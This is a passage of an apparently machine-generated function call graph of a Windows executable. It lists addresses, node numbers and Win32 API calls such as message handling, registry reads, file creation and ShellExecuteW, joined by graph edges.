c0d52f 64655->64659 64657 c0d4bf 4 API calls 64656->64657 64665 c0d576 64657->64665 64658 c0d558 64672 bbc170 11 API calls 64658->64672 64659->64658 64660 c0d543 64659->64660 64659->64665 64671 bbc170 11 API calls 64660->64671 64663 c0d54b 64668 c0d4fb 64663->64668 64665->64648 64666->64652 64667->64619 64669 c0d4bf 4 API calls 64668->64669 64670 c0d50d 64669->64670 64670->64665 64671->64663 64672->64663 64674 bac269 11 API calls 64673->64674 64675 c2d30e CharUpperBuffW 64674->64675 64676 c2d329 64675->64676 64677 ba8685 11 API calls 64676->64677 64678 c2d347 _wcslen 64677->64678 64678->64030 64679->64100 64680 bbf9b1 64681 bbf9bb 64680->64681 64682 bbf9dc 64680->64682 64687 bac34b 64681->64687 64684 bbf9cb 64685 bac34b 9 API calls 64684->64685 64686 bbf9db 64685->64686 64688 bac359 64687->64688 64689 bac381 messages 64687->64689 64690 bac367 64688->64690 64691 bac34b 9 API calls 64688->64691 64689->64684 64692 bac36d 64690->64692 64693 bac34b 9 API calls 64690->64693 64691->64690 64692->64689 64694 bac780 9 API calls 64692->64694 64693->64692 64694->64689 64695 bf3375 64696 bf425c Sleep 64695->64696 64702 baee60 messages 64696->64702 64697 baf1c1 PeekMessageW 64697->64702 64698 baeeb7 GetInputState 64698->64697 64698->64702 64699 baf085 64700 bf3271 TranslateAcceleratorW 64700->64702 64702->64697 64702->64698 64702->64699 64702->64700 64703 baf23f PeekMessageW 64702->64703 64704 baf223 TranslateMessage DispatchMessageW 64702->64704 64705 baf0b4 timeGetTime 64702->64705 64706 baf25f Sleep 64702->64706 64707 bf4127 Sleep 64702->64707 64709 bf338d timeGetTime 64702->64709 64721 bf4004 64702->64721 64722 bb02f0 143 API calls 64702->64722 64723 bb2ad0 143 API calls 64702->64723 64724 baf400 64702->64724 64729 baf680 64702->64729 64746 bbf2a5 64702->64746 64751 bbf27e timeGetTime 64702->64751 64753 c14384 11 API calls 64702->64753 64703->64702 64704->64703 64705->64702 64706->64702 64707->64721 64752 bba9e5 12 API calls 64709->64752 64712 bf41be GetExitCodeProcess 64714 bf41ea CloseHandle 64712->64714 64715 bf41d4 WaitForSingleObject 64712->64715 64713 c3331e GetForegroundWindow 64713->64721 64714->64721 64715->64702 64715->64714 64717 bf3cf5 64717->64699 64721->64696 64721->64702 64721->64712 64721->64713 64721->64717 64754 c0f1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 64721->64754 64755 bbf27e timeGetTime 64721->64755 64722->64702 64723->64702 64725 baf411 64724->64725 64726 baf433 64725->64726 64756 bae910 64725->64756 64728 baf42a 64728->64702 64730 baf6c0 64729->64730 64744 baf78c messages 64730->64744 64789 bc05d2 5 API calls __Init_thread_wait 64730->64789 64734 bf457d 64734->64744 64790 bc0433 22 API calls __onexit 64734->64790 64736 bf45a1 64791 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 64736->64791 64739 babe6d 9 API calls 64739->64744 64740 bb02f0 143 API calls 64740->64744 64741 bafa91 64741->64702 64744->64739 64744->64740 64744->64741 64788 bbb2d6 143 API calls 64744->64788 64792 bc05d2 5 API calls __Init_thread_wait 64744->64792 64793 bc0433 22 API calls __onexit 64744->64793 64794 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 64744->64794 64795 c25131 38 API calls 64744->64795 64796 c2721e 143 API calls 64744->64796 64747 bbf2b8 64746->64747 64748 bbf2c1 64746->64748 64747->64702 64748->64747 64749 bbf2e5 IsDialogMessageW 64748->64749 64750 bff83b GetClassLongW 64748->64750 64749->64747 64749->64748 64750->64748 64750->64749 64751->64702 64752->64702 64753->64702 64754->64721 64755->64721 64757 bb02f0 143 API calls 64756->64757 64775 bae94d 64757->64775 64758 bae9bb messages 64758->64728 64759 baea73 64761 baea7e 64759->64761 64762 baed85 64759->64762 64760 baecaf 64764 bf3167 64760->64764 64765 baecc4 64760->64765 64763 bc016b 9 API calls 64761->64763 64762->64758 64770 bc019b 9 API calls 64762->64770 64773 baea85 __fread_nolock 64763->64773 64787 c26062 9 API calls 64764->64787 64768 bc016b 9 API calls 64765->64768 64766 baeb68 64771 bc019b 9 API calls 64766->64771 64777 baeb1a 64768->64777 64769 bc016b 9 API calls 64769->64775 64770->64773 64779 baead9 __fread_nolock messages 64771->64779 64772 bc016b 9 API calls 64774 baeaa6 64772->64774 64773->64772 64773->64774 64774->64779 64780 bad210 64774->64780 64775->64758 64775->64759 64775->64762 64775->64766 64775->64769 64775->64779 64777->64728 64779->64760 64779->64777 64786 ba4485 143 API calls 64779->64786 64781 bad24a 64780->64781 64783 bad276 64780->64783 64782 baf680 143 API calls 64781->64782 64785 bad250 64781->64785 64782->64785 64784 bb02f0 143 API calls 64783->64784 64784->64785 64785->64779 64786->64779 64787->64758 64788->64744 64789->64734 64790->64736 64791->64744 64792->64744 64793->64744 64794->64744 64795->64744 64796->64744 64797 bf55f4 64804 bbe34f 64797->64804 64799 bf560a 64803 bf5685 64799->64803 64813 bba9e5 12 API calls 64799->64813 64801 bf5665 64801->64803 64814 c12393 11 API calls 64801->64814 64805 bbe35d 64804->64805 64806 bbe370 64804->64806 64807 bab3fe 9 API calls 64805->64807 64808 bbe3a3 64806->64808 64809 bbe375 64806->64809 64812 bbe367 64807->64812 64811 bab3fe 9 API calls 64808->64811 64810 bc016b 9 API calls 64809->64810 64810->64812 64811->64812 64812->64799 64813->64801 64814->64803 64815 bb0e6f 64816 bb0e83 64815->64816 64821 bb13d5 64815->64821 64817 bb0e95 64816->64817 64819 bc016b 9 API calls 64816->64819 64818 bab3fe 9 API calls 64817->64818 64820 bb0eee 64817->64820 64833 bb044d messages 64817->64833 64818->64817 64819->64817 64822 bb2ad0 143 API calls 64820->64822 64820->64833 64821->64817 64823 babe6d 9 API calls 64821->64823 64835 bb0326 messages 64822->64835 64823->64817 64824 bb1645 64828 babe6d 9 API calls 64824->64828 64824->64833 64825 bc016b 9 API calls 64825->64835 64826 babe6d 9 API calls 64826->64835 64827 bf5c7f 64830 babe6d 9 API calls 64827->64830 64827->64833 64828->64833 64829 bb1940 143 API calls 64829->64835 64830->64833 64831 bc05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 64831->64835 64832 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 64832->64835 64834 bc0433 22 API calls pre_c_initialization 64834->64835 64835->64824 64835->64825 64835->64826 64835->64827 64835->64829 64835->64831 64835->64832 64835->64833 64835->64834 64836 bb15af 64837 bbe34f 11 API calls 64836->64837 64838 bb15c5 64837->64838 64841 bbe3b3 64838->64841 64840 bb15ef 64842 ba7a14 11 API calls 64841->64842 64843 bbe3ea 64842->64843 64844 bab25f 11 API calls 64843->64844 64845 bbe41b 64843->64845 64846 bfe4e4 64844->64846 64845->64840 64847 ba7af4 11 API calls 64846->64847 64848 bfe4ef 64847->64848 64853 bbe73b 31 API calls 64848->64853 64850 bfe502 64851 bab3fe 9 API calls 64850->64851 64852 bfe506 64850->64852 64851->64852 64852->64852 64853->64850 64854 be27a2 64857 ba2a52 64854->64857 64858 be39f4 DestroyWindow 64857->64858 64859 ba2a91 mciSendStringW 64857->64859 64867 be3a00 64858->64867 64860 ba2aad 64859->64860 64864 ba2d08 64859->64864 64863 ba2abb 64860->64863 64860->64867 64861 ba2d17 UnregisterHotKey 64861->64864 64862 be3a1e FindClose 64862->64867 64865 be3a45 64863->64865 64868 ba2ad0 64863->64868 64864->64860 64864->64861 64869 be3a69 64865->64869 64870 be3a58 FreeLibrary 64865->64870 64866 ba7953 FindCloseChangeNotification 64866->64867 64867->64862 64867->64865 64867->64866 64868->64869 64875 ba2ade 64868->64875 64871 be3a7d VirtualFree 64869->64871 64873 ba2b4b 64869->64873 64870->64865 64871->64869 64872 ba2b3a OleUninitialize 64872->64873 64874 ba2b66 64873->64874 64877 be3ac5 messages 64873->64877 64881 ba2f86 VirtualFreeEx CloseHandle 64874->64881 64875->64872 64878 ba2b7c 64878->64877 64882 ba2eb8 CloseHandle 64878->64882 64880 ba2d03 64881->64878 64882->64880 64883 bdd1e0 GetEnvironmentStringsW 64884 bdd1f4 64883->64884 64885 bdd1f0 64883->64885 64890 bd3bb0 64884->64890 64887 bdd208 __fread_nolock 64895 bd2d58 64887->64895 64889 bdd222 FreeEnvironmentStringsW 64889->64885 64891 bd3bec 64890->64891 64893 bd3bbe pre_c_initialization 64890->64893 64891->64887 64892 bd3bd9 RtlAllocateHeap 64892->64891 64892->64893 64893->64891 64893->64892 64900 bc523d 7 API calls 2 library calls 64893->64900 64896 bd2d8c 64895->64896 64897 bd2d63 RtlFreeHeap 64895->64897 64896->64889 64897->64896 64898 bd2d78 64897->64898 64899 bd2d7e GetLastError 64898->64899 64899->64896 64900->64893 64901 bad4a4 64902 bad4d6 64901->64902 64903 bc016b 9 API calls 64902->64903 64904 bad539 64903->64904 64918 bac2cd 64904->64918 64907 bc016b 9 API calls 64908 bad61e messages 64907->64908 64910 babe6d 9 API calls 64908->64910 64911 bab3fe 9 API calls 64908->64911 64913 bf1f1c 64908->64913 64915 bac34b 9 API calls 64908->64915 64916 bad8c1 messages 64908->64916 64909 bac34b 9 API calls 64914 bad95c messages 64909->64914 64910->64908 64911->64908 64917 bad973 64914->64917 64924 bbe284 9 API calls messages 64914->64924 64915->64908 64916->64909 64916->64914 64923 bac2dd 64918->64923 64919 bac2e5 64919->64907 64920 bc016b 9 API calls 64920->64923 64921 babe6d 9 API calls 64921->64923 64922 bac2cd 11 API calls 64922->64923 64923->64919 64923->64920 64923->64921 64923->64922 64924->64914 64925 ba105b 64930 ba522e 64925->64930 64927 ba106a 64955 bc0433 22 API calls __onexit 64927->64955 64929 ba1074 64931 ba523e 64930->64931 64956 ba51bf 64931->64956 64934 ba65a4 11 API calls 64935 ba5316 64934->64935 64962 ba684e 64935->64962 64937 ba5325 64938 babceb 11 API calls 64937->64938 64939 ba5337 RegOpenKeyExW 64938->64939 64940 be4bc0 RegQueryValueExW 64939->64940 64945 ba5359 64939->64945 64941 be4bdd 64940->64941 64942 be4c56 RegCloseKey 64940->64942 64943 bc019b 9 API calls 64941->64943 64942->64945 64954 be4c68 _wcslen 64942->64954 64944 be4bf6 64943->64944 64946 ba41a6 9 API calls 64944->64946 64945->64927 64947 be4c01 RegQueryValueExW 64946->64947 64948 be4c1e 64947->64948 64951 be4c38 messages 64947->64951 64949 ba84b7 11 API calls 64948->64949 64949->64951 64950 ba627c 11 API calls 64950->64954 64951->64942 64952 bab25f 11 API calls 64952->64954 64953 ba684e 11 API calls 64953->64954 64954->64945 64954->64950 64954->64952 64954->64953 64955->64929 64957 be22f0 64956->64957 64958 ba51cc GetFullPathNameW 64957->64958 64959 ba51ee 64958->64959 64960 ba84b7 11 API calls 64959->64960 64961 ba520c 64960->64961 64961->64934 64963 ba685d 64962->64963 64967 ba687e __fread_nolock 64962->64967 64965 bc019b 9 API calls 64963->64965 64964 bc016b 9 API calls 64966 ba6891 64964->64966 64965->64967 64966->64937 64967->64964 64968 ba1098 64973 ba5d78 64968->64973 64972 ba10a7 64974 babf07 64973->64974 64975 ba5d8f GetVersionExW 64974->64975 64976 ba84b7 11 API calls 64975->64976 64986 ba5ddc 64976->64986 64977 ba5ecc GetCurrentProcess IsWow64Process 64978 ba5ee8 64977->64978 64979 ba5f00 LoadLibraryA 64978->64979 64980 be50f2 GetSystemInfo 64978->64980 64981 ba5f4d GetSystemInfo 64979->64981 64982 ba5f11 GetProcAddress 64979->64982 64983 ba5f27 64981->64983 64982->64981 64985 ba5f21 GetNativeSystemInfo 64982->64985 64987 ba5f2b FreeLibrary 64983->64987 64988 ba109d 64983->64988 64984 be50ad 64985->64983 64986->64977 64986->64984 64987->64988 64989 bc0433 22 API calls __onexit 64988->64989 64989->64972 64990 bfe6dd 64991 bfe68a 64990->64991 64993 c0e753 SHGetFolderPathW 64991->64993 64994 ba84b7 11 API calls 64993->64994 64995 c0e780 64994->64995 64995->64991 64996 bab7d2 64997 bab7dc 64996->64997 65000 babb3d 64997->65000 65001 babbc7 65000->65001 65007 babb4d __fread_nolock 65000->65007 65003 bc019b 9 API calls 65001->65003 65002 bc016b 9 API calls 65004 babb54 65002->65004 65003->65007 65005 bc016b 9 API calls 65004->65005 65006 bab7e8 65004->65006 65005->65006 65007->65002 65008 bab810 65015 ba91c7 65008->65015 65010 bab84b 65012 babb3d 11 API calls 65010->65012 65011 bab821 65011->65010 65013 babb3d 11 API calls 65011->65013 65014 bab60e 65012->65014 65013->65010 65016 babceb 11 API calls 65015->65016 65018 ba91d6 65016->65018 65017 ba9224 65017->65011 65018->65017 65019 baacc0 11 API calls 65018->65019 65019->65018 65020 bc0456 65042 bc047d InitializeCriticalSectionAndSpinCount GetModuleHandleW 65020->65042 65022 bc045b 65053 bc027a 65022->65053 65024 bc0462 65025 bc0475 65024->65025 65026 bc0467 65024->65026 65059 bc0bcf IsProcessorFeaturePresent 65025->65059 65063 bc0433 22 API calls __onexit 65026->65063 65029 bc0471 65030 bc047c InitializeCriticalSectionAndSpinCount GetModuleHandleW 65032 bc04d8 GetProcAddress GetProcAddress GetProcAddress 65030->65032 65033 bc04c3 GetModuleHandleW 65030->65033 65035 bc053e CreateEventW 65032->65035 65036 bc0506 65032->65036 65033->65032 65034 bc0564 65033->65034 65037 bc0bcf ___scrt_fastfail 4 API calls 65034->65037 65035->65034 65041 bc050e __crt_fast_encode_pointer 65035->65041 65036->65035 65036->65041 65038 bc056b DeleteCriticalSection 65037->65038 65039 bc0587 65038->65039 65040 bc0580 CloseHandle 65038->65040 65040->65039 65043 bc04d8 GetProcAddress GetProcAddress GetProcAddress 65042->65043 65044 bc04c3 GetModuleHandleW 65042->65044 65046 bc053e CreateEventW 65043->65046 65047 bc0506 65043->65047 65044->65043 65045 bc0564 65044->65045 65048 bc0bcf ___scrt_fastfail 4 API calls 65045->65048 65046->65045 65052 bc050e __crt_fast_encode_pointer 65046->65052 65047->65046 65047->65052 65049 bc056b DeleteCriticalSection 65048->65049 65050 bc0587 65049->65050 65051 bc0580 CloseHandle 65049->65051 65050->65022 65051->65050 65052->65022 65054 bc028d 65053->65054 65055 bc0289 65053->65055 65056 bc0bcf ___scrt_fastfail 4 API calls 65054->65056 65058 bc029a pre_c_initialization ___scrt_release_startup_lock 65054->65058 65055->65024 65057 bc031e 65056->65057 65058->65024 65060 bc0be4 ___scrt_fastfail 65059->65060 65061 bc0c8f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 65060->65061 65062 bc0cda ___scrt_fastfail 65061->65062 65062->65030 65063->65029 65064 bf6553 65065 bc016b 9 API calls 65064->65065 65066 bf655a 65065->65066 65070 c0fa10 65066->65070 65068 bf6566 65069 c0fa10 9 API calls 65068->65069 65069->65068 65071 c0fa30 65070->65071 65072 c0faf9 65071->65072 65073 bc019b 9 API calls 65071->65073 65072->65068 65074 c0fa6c 65073->65074 65074->65072 65075 babe6d 9 API calls 65074->65075 65075->65074 65076 bd8792 65081 bd854e 65076->65081 65080 bd87ba 65085 bd857f 65081->65085 65082 bd86c8 65084 bd86d3 65082->65084 65100 bd2b7c 19 API calls __wsopen_s 65082->65100 65084->65080 65091 be0d24 65084->65091 65085->65082 65094 bc919b 65085->65094 65088 bc919b 31 API calls 65089 bd873b 65088->65089 65089->65082 65090 bc919b 31 API calls 65089->65090 65090->65082 65103 be0421 65091->65103 65093 be0d3f 65093->65080 65095 bc923b 65094->65095 65097 bc91af 65094->65097 65102 bc9253 31 API calls __wsopen_s 65095->65102 65099 bc91d1 65097->65099 65101 bd2b7c 19 API calls __wsopen_s 65097->65101 65099->65082 65099->65088 65100->65084 65101->65099 65102->65099 65104 be042d ___scrt_is_nonwritable_in_current_image 65103->65104 65105 be043b 65104->65105 65106 be0474 65104->65106 65134 bd2b7c 19 API calls __wsopen_s 65105->65134 65110 be09fb 65106->65110 65109 be044a __wsopen_s 65109->65093 65135 be07cf 65110->65135 65112 be0a18 65113 be0a2d 65112->65113 65147 be073a CreateFileW 65112->65147 65113->65109 65115 be0aa4 65116 be0b21 GetFileType 65115->65116 65118 be0af6 GetLastError __dosmaperr 65115->65118 65148 be073a CreateFileW 65115->65148 65117 be0b2c GetLastError __dosmaperr CloseHandle 65116->65117 65120 be0b73 65116->65120 65117->65113 65132 be0b63 65117->65132 65118->65113 65122 be0be0 65120->65122 65149 be094b 34 API calls 2 library calls 65120->65149 65121 be0ae9 65121->65116 65121->65118 65127 be0c0d 65122->65127 65150 be04ed 34 API calls 2 library calls 65122->65150 65125 be0c06 65126 be0c1e 65125->65126 65125->65127 65126->65113 65129 be0c9c CloseHandle 65126->65129 65151 bd8a3e 65127->65151 65158 be073a CreateFileW 65129->65158 65131 be0cc7 65131->65132 65133 be0cd1 GetLastError __dosmaperr 65131->65133 65132->65113 65133->65132 65134->65109 65136 be080a 65135->65136 65138 be07f0 65135->65138 65159 be075f 65136->65159 65138->65136 65164 bd2b7c 19 API calls __wsopen_s 65138->65164 65140 be0842 65141 be0871 65140->65141 65165 bd2b7c 19 API calls __wsopen_s 65140->65165 65142 be093e 65141->65142 65145 be08c4 65141->65145 65166 bd2b8c 11 API calls _abort 65142->65166 65145->65112 65146 be094a 65147->65115 65148->65121 65149->65122 65150->65125 65152 bd8a4e 65151->65152 65153 bd8a54 65152->65153 65154 bd8a92 FindCloseChangeNotification 65152->65154 65155 bd8ac8 __dosmaperr 65153->65155 65157 bd8ad4 65153->65157 65154->65153 65156 bd8a9e GetLastError 65154->65156 65155->65157 65156->65153 65157->65113 65158->65131 65161 be0777 65159->65161 65160 be0792 65160->65140 65161->65160 65167 bd2b7c 19 API calls __wsopen_s 65161->65167 65163 be07c1 65163->65140 65164->65136 65165->65141 65166->65146 65167->65163 65168 bcf08e 65169 bcf09a ___scrt_is_nonwritable_in_current_image 65168->65169 65170 bcf0bb 65169->65170 65171 bcf0a6 65169->65171 65175 bcf0fb 65170->65175 65178 bd2b7c 19 API calls __wsopen_s 65171->65178 65174 bcf0b6 __wsopen_s 65179 bcf126 65175->65179 65177 bcf108 65177->65174 65178->65174 65180 bcf134 65179->65180 65181 bcf14e 65179->65181 65190 bd2b7c 19 API calls __wsopen_s 65180->65190 65187 bd9799 65181->65187 65184 bcf144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65184->65177 65192 bd9616 65187->65192 65189 bcf173 65189->65184 65191 bcf2bb 22 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65189->65191 65190->65184 65191->65184 65193 bd9622 ___scrt_is_nonwritable_in_current_image 65192->65193 65194 bd96f6 65193->65194 65195 bd967a 65193->65195 65198 bd962a __wsopen_s 65193->65198 65204 bd2b7c 19 API calls __wsopen_s 65194->65204 65195->65198 65199 bd971b 65195->65199 65198->65189 65200 bd972d 65199->65200 65201 bd9735 65200->65201 65202 bd9746 SetFilePointerEx 65200->65202 65201->65198 65202->65201 65203 bd975e GetLastError __dosmaperr 65202->65203 65203->65201 65204->65198 65205 baf48c 65208 baca50 65205->65208 65207 baf49a 65209 baca6b 65208->65209 65210 bf14af 65209->65210 65211 bf1461 65209->65211 65218 baca90 65209->65218 65240 c261ff 143 API calls 2 library calls 65210->65240 65214 bf146b 65211->65214 65216 bf1478 65211->65216 65211->65218 65238 c26690 143 API calls 65214->65238 65229 bacd60 65216->65229 65239 c26b2d 143 API calls 2 library calls 65216->65239 65220 bbe781 31 API calls 65218->65220 65223 bf168b 65218->65223 65227 bab3fe 9 API calls 65218->65227 65228 bacf30 31 API calls 65218->65228 65218->65229 65230 bb02f0 143 API calls 65218->65230 65231 babe6d 9 API calls 65218->65231 65232 bbe73b 31 API calls 65218->65232 65233 bbaa19 143 API calls 65218->65233 65234 bc05d2 5 API calls __Init_thread_wait 65218->65234 65235 bc0433 22 API calls __onexit 65218->65235 65236 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 65218->65236 65237 bbf354 143 API calls 65218->65237 65220->65218 65241 c26569 11 API calls 65223->65241 65227->65218 65228->65218 65229->65207 65230->65218 65231->65218 65232->65218 65233->65218 65234->65218 65235->65218 65236->65218 65237->65218 65238->65216 65239->65229 65240->65218 65241->65229 65242 bc078b 65243 bc0797 ___scrt_is_nonwritable_in_current_image 65242->65243 65272 bc0241 65243->65272 65245 bc079e 65246 bc08f1 65245->65246 65249 bc07c8 65245->65249 65247 bc0bcf ___scrt_fastfail 4 API calls 65246->65247 65248 bc08f8 65247->65248 65303 bc51e2 65248->65303 65259 bc0807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65249->65259 65280 bd280d 65249->65280 65256 bc07e7 65263 bc0868 65259->65263 65306 bc51aa 31 API calls 4 library calls 65259->65306 65260 bc086e 65292 ba32a2 65260->65292 65288 bc0ce9 65263->65288 65266 bc088a 65266->65248 65267 bc088e 65266->65267 65268 bc0897 65267->65268 65308 bc5185 17 API calls _abort 65267->65308 65309 bc03d0 ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks ___vcrt_uninitialize_winapi_thunks ___scrt_uninitialize_crt ___vcrt_uninitialize 65268->65309 65271 bc089f 65271->65256 65273 bc024a 65272->65273 65311 bc0a28 IsProcessorFeaturePresent 65273->65311 65275 bc0256 65312 bc3024 ___vcrt_initialize_winapi_thunks ___vcrt_initialize_locks ___vcrt_uninitialize_locks 65275->65312 65277 bc025b 65278 bc025f 65277->65278 65313 bc304d ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks ___vcrt_uninitialize_winapi_thunks 65277->65313 65278->65245 65281 bd2824 65280->65281 65314 bc0e1c 65281->65314 65283 bc07e1 65283->65256 65284 bd27b1 65283->65284 65285 bd27e0 65284->65285 65286 bc0e1c _ValidateLocalCookies 5 API calls 65285->65286 65287 bd2809 65286->65287 65287->65259 65322 bc26d0 65288->65322 65291 bc0d0f 65291->65260 65293 ba32ae IsThemeActive 65292->65293 65294 ba3309 65292->65294 65324 bc52d3 65293->65324 65307 bc0d22 GetModuleHandleW 65294->65307 65296 ba32d9 65297 bc5339 19 API calls 65296->65297 65298 ba32e0 65297->65298 65330 ba326d SystemParametersInfoW SystemParametersInfoW 65298->65330 65300 ba32e7 65331 ba3312 65300->65331 65302 ba32ef SystemParametersInfoW 65302->65294 65884 bc4f5f 65303->65884 65306->65263 65307->65266 65308->65268 65309->65271 65311->65275 65312->65277 65313->65278 65315 bc0e25 65314->65315 65316 bc0e27 IsProcessorFeaturePresent 65314->65316 65315->65283 65318 bc0fee 65316->65318 65321 bc0fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65318->65321 65320 bc10d1 65320->65283 65321->65320 65323 bc0cfc GetStartupInfoW 65322->65323 65323->65291 65325 bc52df ___scrt_is_nonwritable_in_current_image 65324->65325 65371 bd32ee EnterCriticalSection 65325->65371 65327 bc52ea pre_c_initialization 65372 bc532a 65327->65372 65329 bc531f __wsopen_s 65329->65296 65330->65300 65332 ba3322 65331->65332 65333 ba332e GetCurrentDirectoryW 65332->65333 65334 ba4f60 65333->65334 65335 ba3355 IsDebuggerPresent 65334->65335 65336 be3c7d MessageBoxA 65335->65336 65337 ba3363 65335->65337 65338 be3c95 65336->65338 65337->65338 65339 ba3377 65337->65339 65410 ba40e0 65338->65410 65376 ba3a1c 65339->65376 65343 ba3396 GetFullPathNameW 65344 ba84b7 11 API calls 65343->65344 65345 ba33d5 65344->65345 65390 ba41e6 65345->65390 65346 ba33e9 65348 be3cc6 SetCurrentDirectoryW 65346->65348 65349 ba33f1 65346->65349 65348->65349 65350 ba33fc 65349->65350 65354 be3cf3 65349->65354 65406 ba345a 7 API calls 65350->65406 65355 bab25f 11 API calls 65354->65355 65356 be3d0a 65355->65356 65358 be3d39 65356->65358 65359 be3d12 65356->65359 65357 ba3406 65362 ba343d SetCurrentDirectoryW 65357->65362 65361 ba65a4 11 API calls 65358->65361 65360 ba65a4 11 API calls 65359->65360 65363 be3d1d 65360->65363 65364 be3d35 GetForegroundWindow ShellExecuteW 65361->65364 65365 ba3451 65362->65365 65366 ba7af4 11 API calls 65363->65366 65368 be3d6a 65364->65368 65365->65302 65369 be3d2b 65366->65369 65368->65357 65370 ba65a4 11 API calls 65369->65370 65370->65364 65371->65327 65375 bd3336 LeaveCriticalSection 65372->65375 65374 bc5331 65374->65329 65375->65374 65377 ba3a29 65376->65377 65378 ba3a42 65377->65378 65379 be40b4 ___scrt_fastfail 65377->65379 65418 ba39de 65378->65418 65380 be40d0 GetOpenFileNameW 65379->65380 65382 be411f 65380->65382 65383 ba84b7 11 API calls 65382->65383 65385 be4134 65383->65385 65385->65385 65387 ba3a60 65433 ba6085 65387->65433 65391 ba41f3 65390->65391 65849 ba5937 65391->65849 65393 ba41f8 65394 ba4272 65393->65394 65860 ba489e 9 API calls 65393->65860 65394->65346 65396 ba4205 65396->65394 65861 ba4558 12 API calls 65396->65861 65398 ba420e 65398->65394 65399 ba4212 GetFullPathNameW 65398->65399 65400 ba84b7 11 API calls 65399->65400 65883 ba35ab 7 API calls 65406->65883 65408 ba3401 65409 ba353a CreateWindowExW CreateWindowExW ShowWindow ShowWindow 65408->65409 65409->65357 65411 ba40ee 65410->65411 65412 ba4145 65410->65412 65414 ba40ff 65411->65414 65415 bc016b 9 API calls 65411->65415 65413 bc016b 9 API calls 65412->65413 65413->65414 65416 ba4154 9 API calls 65414->65416 65415->65414 65417 ba4116 65416->65417 65417->65346 65419 be22f0 65418->65419 65420 ba39eb GetLongPathNameW 65419->65420 65421 ba84b7 11 API calls 65420->65421 65422 ba3a13 65421->65422 65423 ba5379 65422->65423 65424 ba538b 65423->65424 65425 be4d35 65424->65425 65426 ba53a1 65424->65426 65428 bbe2e5 26 API calls 65425->65428 65431 be4d57 65425->65431 65427 ba684e 11 API calls 65426->65427 65429 ba53ad 65427->65429 65428->65425 65457 ba1340 65429->65457 65432 ba53c0 65432->65387 65463 ba636d 65433->65463 65436 be51bf 65440 be51d4 65436->65440 65441 be51f1 65436->65441 65437 ba636d 50 API calls 65438 ba60be 65437->65438 65438->65436 65439 ba60c6 65438->65439 65444 be51dc 65439->65444 65445 ba60d2 65439->65445 65563 ba63db 65440->65563 65443 bc019b 9 API calls 65441->65443 65456 be5236 65443->65456 65569 c0e223 37 API calls 65444->65569 65485 ba3aa3 65445->65485 65448 be51ea 65448->65441 65449 ba338e 65449->65343 65449->65346 65450 ba63db 23 API calls 65453 be53e7 65450->65453 65451 babb3d 11 API calls 65451->65456 65453->65450 65576 c0a12a 39 API calls 65453->65576 65455 bab25f 11 API calls 65455->65456 65456->65451 65456->65453 65456->65455 65570 ba5ad3 65456->65570 65458 ba1352 65457->65458 65462 ba1371 __fread_nolock 65457->65462 65461 bc019b 9 API calls 65458->65461 65459 bc016b 9 API calls 65460 ba1388 65459->65460 65460->65432 65461->65462 65462->65459 65577 ba6332 LoadLibraryA 65463->65577 65468 ba6398 LoadLibraryExW 65585 ba62fb LoadLibraryA 65468->65585 65469 be54b4 65471 ba63db 23 API calls 65469->65471 65473 be54bb 65471->65473 65475 ba62fb 3 API calls 65473->65475 65477 be54c3 65475->65477 65476 ba63c2 65476->65477 65478 ba63ce 65476->65478 65602 ba653a 65477->65602 65480 ba63db 23 API calls 65478->65480 65482 ba60aa 65480->65482 65482->65436 65482->65437 65484 be54ea 65486 ba3acc 65485->65486 65487 be4139 65485->65487 65489 bc019b 9 API calls 65486->65489 65769 c0a12a 39 API calls 65487->65769 65491 ba3af0 65489->65491 65490 be414c 65494 ba3b56 65490->65494 65492 ba7953 FindCloseChangeNotification 65491->65492 65493 ba3afe 65492->65493 65495 ba7953 FindCloseChangeNotification 65493->65495 65496 c0d4bf 4 API calls 65494->65496 65501 ba3b64 65494->65501 65497 ba3b10 65495->65497 65496->65501 65498 ba7953 FindCloseChangeNotification 65497->65498 65499 ba3b19 65498->65499 65500 ba6e52 5 API calls 65499->65500 65502 ba3b33 65500->65502 65506 ba41c9 2 API calls 65501->65506 65503 ba3b3b 65502->65503 65504 be456b 65502->65504 65509 ba6b12 16 API calls 65503->65509 65775 c0a12a 39 API calls 65504->65775 65508 ba3bbc 65506->65508 65507 be4580 65507->65507 65510 ba6bfa 3 API calls 65508->65510 65511 ba3b4d 65509->65511 65512 ba3bc8 65510->65512 65768 ba6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 65511->65768 65514 be41c5 65512->65514 65517 ba3bd9 65512->65517 65515 ba7953 FindCloseChangeNotification 65514->65515 65516 be41ce 65515->65516 65518 ba636d 50 API calls 65516->65518 65519 ba694e 11 API calls 65517->65519 65525 be41f6 65518->65525 65521 ba3c02 65519->65521 65520 be4502 65773 c0a12a 39 API calls 65520->65773 65523 ba7af4 11 API calls 65521->65523 65524 ba3c13 SetCurrentDirectoryW 65523->65524 65530 ba3c26 65524->65530 65525->65520 65526 ba63db 23 API calls 65525->65526 65527 be4223 65526->65527 65527->65520 65528 be422b 65527->65528 65529 bc016b 9 API calls 65528->65529 65531 be4253 65529->65531 65532 bc019b 9 API calls 65530->65532 65537 babb3d 11 API calls 65531->65537 65533 ba3c39 65532->65533 65535 ba41a6 9 API calls 65533->65535 65534 ba7953 FindCloseChangeNotification 65536 ba3dc6 65534->65536 65559 ba3c44 messages _wcslen 65535->65559 65540 ba7953 FindCloseChangeNotification 65536->65540 65557 be4294 65537->65557 65538 be446f 65770 c113a0 9 API calls 65538->65770 65539 ba3d71 65542 ba7953 FindCloseChangeNotification 65539->65542 65543 ba3dd8 65540->65543 65544 ba3d7a SetCurrentDirectoryW 65542->65544 65543->65449 65553 ba3d94 messages 65544->65553 65546 be4495 65771 c04a0c 11 